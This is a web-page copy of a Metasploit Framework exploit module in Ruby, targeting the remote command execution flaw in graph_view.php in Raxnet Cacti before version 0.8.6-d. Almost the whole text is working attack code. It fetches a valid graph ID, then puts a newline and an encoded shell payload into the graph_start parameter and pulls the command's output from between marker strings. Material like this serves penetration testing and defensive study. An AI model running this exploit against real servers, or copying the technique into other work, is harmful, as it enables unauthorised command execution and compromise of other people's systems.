Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/cacti_graphimage_exec.rb
24841 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Cacti graph_view.php Remote Command Execution',

17
        'Description' => %q{

18
          This module exploits an arbitrary command execution vulnerability in the

19
          Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to

20
          0.8.6-d are vulnerable.

21
        },

22
        'Author' => [ 'David Maciejak <david.maciejak[at]kyxar.fr>', 'hdm' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2005-10004' ],

26
          [ 'OSVDB', '17539' ],

27
          [ 'BID', '14042' ],

28
        ],

29
        'Privileged' => false,

30
        'Payload' => {

31
          'DisableNops' => true,

32
          'Space' => 512,

33
          'Compat' =>

34
                        {

35
                          'PayloadType' => 'cmd',

36
                          'RequiredCmd' => 'generic perl ruby python telnet',

37
                        }

38
        },

39
        'Platform' => 'unix',

40
        'Arch' => ARCH_CMD,

41
        'Targets' => [[ 'Automatic', {}]],

42
        'DisclosureDate' => '2005-01-15',

43
        'DefaultTarget' => 0,

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),

55
      ]

56
    )

57
  end

58


59
  def exploit

60
    # Obtain a valid image ID

61
    res = send_request_cgi({

62
      'uri' => normalize_uri(datastore['URI']),

63
      'vars_get' =>

64
        {

65
          'action' => 'list'

66
        }

67
    }, 10)

68


69
    if (not res)

70
      print_error("The server gave no response")

71
      return

72
    end

73


74
    m = res.body.match(/local_graph_id=(.*?)&/)

75
    if (not m)

76
      print_error("Could not locate a valid image ID")

77
      return

78
    end

79


80
    # Trigger the command execution bug

81
    res = send_request_cgi({

82
      'uri' => normalize_uri(datastore['URI']),

83
      'vars_get' =>

84
        {

85
          'local_graph_id' => m[1],

86
          'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n"

87
        }

88
    }, 25)

89


90
    if (res)

91
      print_status("The server returned: #{res.code} #{res.message}")

92
      print("")

93


94
      m = res.body.match(/YYY(.*)YYY/)

95


96
      if (m)

97
        print_status("Command output from the server:")

98
        print(m[1])

99
      else

100
        print_status("This server may not be vulnerable")

101
      end

102


103
    else

104
      print_status("No response from the server")

105
    end

106
  end

107
end

108


109